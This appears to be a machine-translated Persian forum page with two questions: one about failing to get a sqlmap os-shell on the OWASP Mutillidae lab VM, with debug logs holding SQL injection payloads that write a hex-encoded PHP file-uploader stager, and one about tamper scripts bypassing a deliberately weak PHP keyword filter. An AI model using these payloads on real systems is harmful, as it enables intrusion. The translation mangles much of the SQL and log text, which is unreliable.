php – مشکل با SQLmap در os-shell
من با استفاده از SQLMAP در لینوکس کالی شروع کردم، همچنین WebApp VMWARE را از OWASP پاک کردم.
من سعی کردم دستور command -os-shell را برای دسترسی به OWASP VMware با این کار انجام دهم:
اما همیشه اطلاعات و خطا زیر را دریافت کردم:
[18:06:50] [INFO] مسیرهای مطلق وب سرور را بازیابی کرد: '/ owaspbwa / mutillidae-git /classes/MySQLHandler.php، /owaspbwa/mutillidae-git/user-info.php، /owaspbwa/mutillidae-git/classes/SQLQueryHandler.php، /owaspbwa/mutillidae-git/index.php'
[18:06:50] [INFO] تست برای آپلود بازیگر فایل بر روی '/ مسیر var / www /' از طریق محدود کردن 'خطوط فسخ توسط روش
[18:06:50] [PAYLOAD] جرمی "محدودیت 0،1 را به OUTFILE، /var/www/tmpucbpx.php خطوط فسخ توسط 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b24666 96c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a– #
[18:06:51] [WARNING] عبارت انعکاسی (بازدید کنندگان) پیدا شده است و فیلتر کردن
[18:06:51] [DEBUG] تلاش برای دیدن اینکه آیا فایل از hxxp: //172.16.61.129: 80 / var / www / tmpucbpx.php قابل دسترسی است
[18:06:51] [DEBUG] charset صفحه وب 'iso-8859-1' را اعلام کرد
[18:06:51] [DEBUG] صفحه یافت نشد (404)
[18:06:51] [DEBUG] تلاش برای دیدن اینکه آیا فایل از hxxp: //172.16.61.129: 80 / www / tmpucbpx.php قابل دسترسی است
[18:06:51] [DEBUG] تلاش برای دیدن اینکه آیا فایل از 'hxxp: //172.16.61.129: 80 / tmpucbpx.php' قابل دسترسی است یا خیر
[18:06:51] [WARNING] قادر به آپلود فایل stager در '/ var / www /'
[18:06:51] [INFO] تلاش برای آپلود فایل پرونده را بر روی '/ var / www /' از طریق روش UNION
[18:06:51] [DEBUG] فایل کدگذاری را به مقدار رشته هگزادسیمال آن
[18:06:51] [DEBUG] صادر می کند و محتویات فایل آن را به '/var/www/tmputilm.php'
[18:06:51] [PAYLOAD] -4911 'اتحاد ALL SELECT 2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a، NULL، NULL، NULL، NULL، NULL، NULL را به DUMPFILE در 1.42 ثانیه
[18:06:52] [WARNING] انتظار شخصیت های ناخواسته در داخل فایل به عنوان یک پس مانده از QUER UNION /var/www/tmputilm.php'#
[18:06:52] [DEBUG] performed 1 نمایش داده شد y
[18:06:52] [DEBUG] چک کردن طول فایل از راه دور '/var/www/tmputilm.php'
[18:06:52] [PAYLOAD] jeremy' اتحاد ALL انتخاب NULL، NULL، NULL، CONCAT (0x717a716a71، IFNULL (CAST (LENGTH (LOAD_FILE (0x2f7661722f7777772f746d707574696c6d2e706870)) AS CHAR)، 0x20)، 0x7170767871)، NULL، NULL، NULL #
[18:06:54] [DEBUG] 1 بار در 1.25 ثانیه انجام شد
[18:06:54] [WARNING] به نظر می رسد که فایل نوشته نشده است (معمولا زمانی رخ می دهد که کاربر فرایند DBMS هیچ مجوزی برای نوشتن در مسیر مقصد)
[18:06:54] [DEBUG] تلاش برای دیدن اینکه آیا فایل از 'hxxp: //172.16.61.129: 80 / var / www / tmputilm.php'
[18:06:54] [DEBUG] قابل دسترسی است یا اینکه از طریق hxxp: //172.16.61.129:80/www/tmputilm.php'
[18:06:54] [DEBUG] تلاش برای دیدن اینکه آیا فایل از 'hxxp: //172.16.61.129: 80 / tmputilm.php' قابل دسترسی است یا خیر
[18:06:54] [INFO] در حال تلاش برای آپلود فایل stager در '/ var / www / mutillidae /' از طریق روش LIMIT 'LINES TERMINATED BY'
[18:06:54] [PAYLOAD] jeremy 'LIMIT 0.1 INTO OUTFILE' /var/www/mutillidae/tmpuxzgo.php 'خطوط قطع شده توسط 0x3c3f7068700a69662028697373657428245f524551554553545b2 275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d617 02066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f6d7574696c6c696461652f3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a– #
[18:06:55] [DEBUG] تلاش برای دیدن اگر فایل از دسترس است hxxp: //172.16.61.129: 80 / مسیر var / www / mutillidae / tmpuxzgo.php '
[18:06:55] [DEBUG] تلاش برای دیدن اگر فایل از دسترس است hxxp: //172.16.61.129: 80 / www / mutillidae / tmpuxzgo.php '
[18:06:55] [DEBUG] تلاش برای دیدن اینکه آیا فایل از hxxp: //172.16.61.129: 80 / mutillidae / tmpuxzgo.php قابل دسترسی است
[18:06:55] [DEBUG] تلاش برای دیدن اینکه آیا فایل از 'hxxp: //172.16.61.129: 80 / tmpuxzgo.php' قابل دسترسی است یا خیر
[18:06:55] [WARNING] قادر به آپلود فایل stager در '/ var / www / mutillidae /'
[18:06:55] [INFO] تلاش برای بارگذاری file stager در '/ var / www / mutillidae /' از طریق روش UNION
[18:06:55] [DEBUG] فایل کدگذاری را به مقدار رشته هگزادسیمال آن [1 9659028] صادرات محتوای فایل متنی به فایل '/var/www/mutillidae/tmpucvcv.php'
[18:06:55] [PAYLOAD] -4460، 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970 UNION ALL SELECT NULL، NULL، NULL، NULL، NULL، NULL IN DUMPFILE '/var/www/mutillidae/tmpucvcv.php'#
[18:06:57] [DEBUG] انجام 1 نمایش در 1.78 ثانیه
[18:06:57] [DEBUG] بررسی طول فایل از راه دور' / var / وو / mutillidae / tmpucvcv.php '
[18:06:57] [PAYLOAD] جرمی' UNION ALL NULL را انتخاب کنید، NULL، NULL، CONCAT (0x717a716a71، IFNULL (CAST (LENGTH (دهنده load_file (0x2f7661722f7777772f6d7574696c6c696461652f746d7075637663762e706870)) به عنوان کاراکتر)، 0x20)، 0x7170767871)، NULL، NULL ، NULL #
[18:06:58] [DEBUG] 1 نمایش در 1.28 ثانیه انجام داد conds
[18:06:58] [WARNING] به نظر می رسد که فایل نوشته نشده است (معمولا زمانی رخ می دهد که کاربر فرایند DBMS هیچ مجوزی در مسیر مقصد ندارد)
[18:06:58] [DEBUG] تلاش برای دیدن اینکه آیا فایل از hxxp: //172.16.61.129 قابل دسترسی است : 80 / var / www / mutillidae / tmpucvcv.php '
[18:06:58] [DEBUG] تلاش برای دیدن اینکه آیا فایل از' hxxp: //172.16.61.129: 80 / www / mutillidae / tmpucvcv.php 'قابل دسترسی است یا خیر
[18:06:58] [DEBUG] اگر فایل از 'hxxp: //172.16.61.129: 80 / mutillidae / tmpucvcv.php' قابل دسترسی باشد
[18:06:58] [DEBUG] برای دیدن اینکه آیا فایل از hxxp: //172.16.61.129: 80 / tmpucvcv.php قابل دسترسی است
[18:07:47] [WARNING] کد خطا HTTP شناسایی در طول اجرای:
404 (Not Found) – 118 بار
[18:07:47] [DEBUG] بسیاری از کد های خطای 4xx و / یا 5xx HTTP می تواند به معنای نوعی از حفاظت باشد (مانند WAF)
من فکر می کنم مشکل با نوشتن نیست دسترسی به سرنوشت، اما کاربر فعلی "mutillidae" است و دسترسی کامل به DB دارد.
[18:11:44] [INFO] دریافت کاربر فعلی
کاربر فعلی: 'mutillidae @٪'
[18:11:44] [INFO] fetching خروجی بیانیه SQL SELECT: 'انتخاب کاربر Grant_priv از mysql.user که کاربر =' mutillidae '
[18:11:46] [WARNING] بازتابنده ارزش (ها) یافت و فیلتر کردن
انتخاب کاربر Grant_priv از mysql.user که کاربر = 'mutillidae' [1]:
[*] mutillidae، Y
من نمی دانم که آیا چیزی از دست رفته، شاید برخی دستور، یا چگونه می توانم بیشتر دسترسی به نوشتن روی / var / www / از سرنوشت به عنوان مثال.
اطلاعات بیشتر درباره Destiny:
سیستم عامل وب: لینوکس اوبونتو 10.04 (Lucid Lynx)
فناوری وب: PHP 5.3. 2، Apache 2.2.14
سیستم عامل DBMS back end: لینوکس اوبونتو
DBMS back-end: MySQL 5
banner: '5.1.41-3ubuntu12.6-log'
امیدوارم کسی بتواند به من بگو که من از دست رفته ام
با تشکر
تزریق sql – تک و دو URL کدگذاری اسکریپت tamper و SQLmap
من در حال تلاش برای درک چگونگی کارکرد اسکریپتهای تروجان sqlmap کار می کنم و وقتی هر یک از آنها قادر به عبور از فیلترهای خاصی هستند. در کد زیر پس از پارامتر POST برای رشته هایی مانند فیلتر OR AND
را انتخاب کنید که برنامه نویس آن را وارد خطا می کند (که اشتباه است).
$ filtered = str_replace ($ filtered_words، $ zap، $ _POST ["id"])؛
$ filtered = urldecode ($ filtered)؛
$ sql = "SELECT user، pass from users WHERE id = '". $ فیلتر شده ""؛
در نتیجه من توانستم با استفاده از chardoubleencode با استفاده از اسکریپت tamper که دوبار رمزگذاری را رمزگذاری می کرد، از آن استفاده کردم. با این حال، زمانی که خط زیر را حذف کردم، انتظار داشتم که با استفاده از charencode که یک بار مجدد کد را رمزگذاری می کند، می توانم از حفاظت دور بمانم.
من می دانم که آدرس PHP کدگذاری و رمزگشایی پارامترهای POST پرواز می کند، اما من می خواهم بدانم زمانی که اسکریپت charencode می تواند از یک مکانیزم حفاظت عبور کند.
بسیار پیش از این خیلی ممنون.